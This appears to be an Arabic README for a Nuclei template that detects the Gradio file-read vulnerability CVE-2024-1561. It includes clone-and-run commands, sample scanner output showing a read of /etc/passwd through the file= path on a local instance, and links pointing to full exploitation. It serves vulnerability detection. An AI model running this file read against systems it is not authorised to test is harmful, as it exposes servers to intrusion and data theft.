
قوالب Nuclei
صُمم قالب Nuclei هذا لاكتشاف ثغرة Gradio CVE-2024-1561 في تطبيقات الويب. Gradio هي مكتبة Python لإنشاء مكونات واجهة مستخدم قابلة للتخصيص حول نماذج التعلم الآلي. قد تسمح هذه الثغرة للمهاجمين بقراءة الملفات من الخادم.
استنسخ هذا المستودع إلى جهازك المحلي وشغّله باستخدام الخيار -t:
git clone https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561
cd Nuclei-Template-CVE-2024-1561
nuclei -target <URL> -t CVE-2024-1561.yaml
مثال:
┌──(gradio-env)─(diablo㉿diablo)-[~/gradio]
└─$ nuclei -target http://127.0.0.1:7860 -t CVE-2024-1561.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.6
projectdiscovery.io
[INF] Current nuclei version: v3.2.6 (outdated)
[INF] Current nuclei-templates version: v9.8.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2024-1561] [http] [high] http://127.0.0.1:7860/file=/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd
يختبر القالب وجود /etc/passwd مطابقًا لمستخدم root. لاستغلال الهدف بالكامل، راجع ما يلي:
https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
https://github.com/DiabloHTB/CVE-2024-1561
إخلاء المسؤولية يُقدَّم هذا القالب لأغراض تعليمية وإعلامية فقط. استخدام هذا القالب لمهاجمة الأهداف دون موافقة متبادلة مسبقة يعد غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والاتحادية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا القالب.